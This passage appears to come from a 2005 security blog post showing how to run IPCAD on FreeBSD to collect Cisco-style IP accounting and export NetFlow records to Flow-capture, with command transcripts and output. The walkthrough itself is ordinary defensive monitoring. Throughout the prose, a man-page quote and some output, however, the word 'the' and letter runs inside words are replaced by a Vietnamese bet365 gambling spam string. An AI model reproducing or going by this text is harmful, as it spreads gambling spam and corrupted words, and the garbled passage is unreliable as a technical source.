Free slots for rsh clients: 9
IPCAD uptime is 2 minutes
orr.taosecurity.com uptime is 17 minutes

We can also check cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 status of our interface. This should look similar to Cisco fans.

orr:/root# rsh localhost show interface wi0
connect to address ::1: Connection refused
Trying 127.0.0.1...
wi0 is up, line protocol is up
  Hardware is Ecá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365rnet, address is 0004.e229.3bba
  Internet address is 131.106.57.173 255.255.248.0
  IP broadcast address is 131.106.63.255
  Encapsulation Ecá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365rnet, loopback not set
  MTU 1500 bytes, BW 11000 Kbit
  Input queue: 0 drops
  Last administrative status change at Thu Apr 14 02:58:55 2005
  5 minute average rate 4208 bits/sec, 1 packets/sec
     1914 packets input, 775739 bytes, 0 no buffer
     0 input errors, 0 CRC, 0 frame, 0 overrun, 0 ignored, 0 abort
     704 packets output, 144852 bytes, 0 underruns
     0 output errors, 45 collisions, 0 interface resets, 0 restarts

Next I ask IPCAD to display Cisco accounting data.

orr:/root# rsh localhost show ip accounting
connect to address ::1: Connection refused
Trying 127.0.0.1...

   Source           Destination              Packets               Bytes
 131.106.57.229   255.255.255.255                  2                 656
 192.168.75.1     255.255.255.255                  1                  60
 131.106.57.79    131.106.63.255                   6                 468
 131.106.57.229   239.255.255.250                  3                 483
 131.106.57.229   224.0.0.22                       2                  80
 131.106.57.229   131.106.63.255                  39                5237
 216.218.215.226  131.106.57.173                   6                3329
 131.106.57.173   216.218.215.226                  8                1147
 66.35.250.209    131.106.57.173                  16                2255
 131.106.57.173   66.35.250.209                   15                2039
...edited...
 131.106.57.83    224.0.0.251                      1                  32
 0.0.0.0          224.0.0.1                        3                  84
 131.106.56.1     255.255.255.255                  1                 328
 0.0.0.0          255.255.255.255                 15                4920

Accounting data age is     2
Accounting data age exact 163
Accounting data saved 1113448566
Interface wi0: received 874, 5 m average 726 bytes/sec, 1 pkts/sec, dropped 0
Flow entries made: 34
Memory usage: 0% (2992 from 1048576)
Free slots for rsh clients: 9
IPCAD uptime is 2 minutes
orr.taosecurity.com uptime is 18 minutes

This is very useful data. You can periodically dump cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365se records, and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n grep cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365m to see cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 level of activity of hosts of interest.

You can collect more granular data by changing one line of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 ipcad.conf file:

capture-ports enable;

As cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 ipcad.conf man page states:

     capture-ports { enable | disable };

           Make ipcad account for UDP/TCP ports, IP protocol and ICMP types on
           a per-interface basis.  This setting is relevant for RSH and inter-
           active export methods only.  Capturing UDP and TCP is  disabled  by
           default  to  maintain historic RSH output format compatibility.  To
           selectively enable capturing ports on certain  interfaces,  specify
           cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365  capture-ports  between cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 appropriate interface configuration
           statements.

After making cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 change, I stop and start IPCAD.

orr:/root# rsh localhost shutdown
connect to address ::1: Connection refused
Trying 127.0.0.1...
Shutdown process started
orr:/root# ipcad -drs
Opening wi0... [LCap] [ERSH] [4096] Initialized as 1
Configured RSH Server listening at 127.0.0.1
No valid entries found in ipcad.dump.
Daemonized.

I clear cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 accounting database for good measure, pause, and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n check some records.

orr:/root# rsh localhost clear ip accounting
connect to address ::1: Connection refused
Trying 127.0.0.1...
IP accounting cleared
orr:/root# rsh localhost show ip accounting
connect to address ::1: Connection refused
Trying 127.0.0.1...

   Source           Destination    Packets        Bytes  SrcPt DstPt Proto   IF
 207.171.166.48   131.106.57.173        60        82444     80 53255     6  wi0
 131.106.57.173   207.171.166.48        37         2102  53255    80     6  wi0
 207.171.166.48   131.106.57.173        10         1145     80 57108     6  wi0
 131.106.57.173   207.171.166.48         8         1547  57108    80     6  wi0
 131.106.56.1     131.106.57.173         1          220     53 59064    17  wi0
 131.106.57.173   131.106.56.1           1           60  59064    53    17  wi0
 131.106.56.1     131.106.57.173         1           60     53 51547    17  wi0
...edited... 
 131.106.58.189   224.0.0.251            3         2240   5353  5353    17  wi0
 131.106.58.191   131.106.63.255         2          156  49407   137    17  wi0

Interface wi0: received 560, 5 m average 485 bytes/sec, 0 pkts/sec, dropped 0
Flow entries made: 19
Memory usage: 0% (1672 from 1048576)
Free slots for rsh clients: 9
IPCAD uptime is 2 minutes
orr.taosecurity.com uptime is 46 minutes

We have gotten closer to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 realm of NSM session data here. While we have socket information (source IP, source port, destination IP, destionation port), we do not have timestamps. I prefer to leave cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 port information out of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 equation and just keep cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 IP and byte counts.

There is one final aspect of IPCAD that deserves mention. In my book I mention Fprobe and ng_netflow as software-based NetFlow collectors. It turns out that IPCAD has cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 same functionality. IPCAD can act as a probe and send NetFlow records to a collector like Flow-capture in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Flow-tools collection.

Let's set up Flow-capture to collect NetFlow records:

orr:/root# mkdir -p /nsm/netflow/ipcad/wi0
orr:/root# flow-capture -w /nsm/netflow/ipcad/wi0 localhost/localhost/9995

I verify that Flow-capture is listening on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 port I specified:

orr:/root# sockstat -4
USER     COMMAND    PID   FD PROTO  LOCAL ADDRESS         FOREIGN ADDRESS      
root     flow-captu 919   1  udp4   127.0.0.1:9995        *:*

Now I tell IPCAD to export NetFlow records by adding cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 following to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 end of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 ipcad.conf file.

netflow export destination 127.0.0.1 9995

Again I shut down IPCAD, restart it, and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n clear cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 records. Notice that IPCAD reports a NetFlow destination.

orr:/root# rsh localhost shutdown
connect to address ::1: Connection refused
Trying 127.0.0.1...
Shutdown process started
orr:/root# ipcad -drs
Opening wi0... [LCap] [ERSH] [4096] Initialized as 1
Configured RSH Server listening at 127.0.0.1
Configured NetFlow destination at 127.0.0.1:9995
138 elements got from ipcad.dump.
Daemonized.

After a few minutes I check IPCAD's status.

orr:/root# rsh localhost status
connect to address ::1: Connection refused
Trying 127.0.0.1...
Interface wi0: received 548, 5 m average 683 bytes/sec, 1 pkts/sec, dropped 0
Flow entries made: 193
NetFlow cached flows: 21
Memory usage: 1% (16984 from 1048576)
Free slots for rsh clients: 9
IPCAD uptime is 2 minutes
orr.taosecurity.com uptime is 1 hour,

Notice how IPCAD reports 21 cached NetFlows. This caused a problem, since apparently IPCAD had not flushed any flows to disk yet. I got cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 following error when trying to read cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 flows using Flow-cat and Flow-print:

orr:/root# flow-cat /nsm/netflow/ipcad/wi0/2005/2005-04/2005-04-13/ | flow-print 
flow-print: ftiheader_read(): Warning, short read while loading header top.
flow-print: ftiheader_read(): failed
flow-print: ftio_init(): failed

Looking at cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 directory holding cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 flows, we see only a .tmp file:

orr:/root# ls /nsm/netflow/ipcad/wi0/2005/2005-04/2005-04-13/
tmp-v05.2005-04-13.235643-0400

One minute later I check IPCAD's status again:

orr:/root# rsh localhost status
connect to address ::1: Connection refused
Trying 127.0.0.1...
Interface wi0: received 638, 5 m average 638 bytes/sec, 0 pkts/sec, dropped 0
Flow entries made: 195
NetFlow cached flows: 0
Memory usage: 1% (17160 from 1048576)
Free slots for rsh clients: 9
IPCAD uptime is 4 minutes
orr.taosecurity.com uptime is  1:01

Now we see zero cached flows, so I use Flow-cat and Flow-print again.

orr:/root# flow-cat /nsm/netflow/ipcad/wi0/2005/2005-04/2005-04-13/ | flow-print 
srcIP            dstIP            prot  srcPort  dstPort  octets      packets
131.106.56.63    224.0.0.251      17    5353     5353     686         2         
131.106.58.184   224.0.0.251      17    5353     5353     189         1         
0.0.0.0          224.0.0.1        2     65535    65535    28          1         
...edited...
131.106.57.94    131.106.63.255   17    137      137      702         9         
131.106.57.94    131.106.63.255   17    138      138      817         4         
66.102.15.100    131.106.57.173   6     80       53759    125977      133       
131.106.57.173   66.102.15.100    6     53759    80       47834       102       
...truncated...

We can view cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365se records because cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 .tmp file is replaced by a real flow record:

orr:/root# ls /nsm/netflow/ipcad/wi0/2005/2005-04/2005-04-13/
ft-v05.2005-04-13.235643-0400

Hopefully you have a better idea how NetFlow works. If you're a student, you have additional material I discussed in class but didn't appear on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 slides!

Also -- here is a link to my blog entry on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 method I'm using now to bond interfaces into ngeth0 on FreeBSD 5.3. Here is a link to my post on Flowgrep.

For news on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 new Sguil FreeBSD port submissions, check on Problem Report ports/77473 for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Sguil-sensor and Problem Report ports/77690 for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Sguil-server.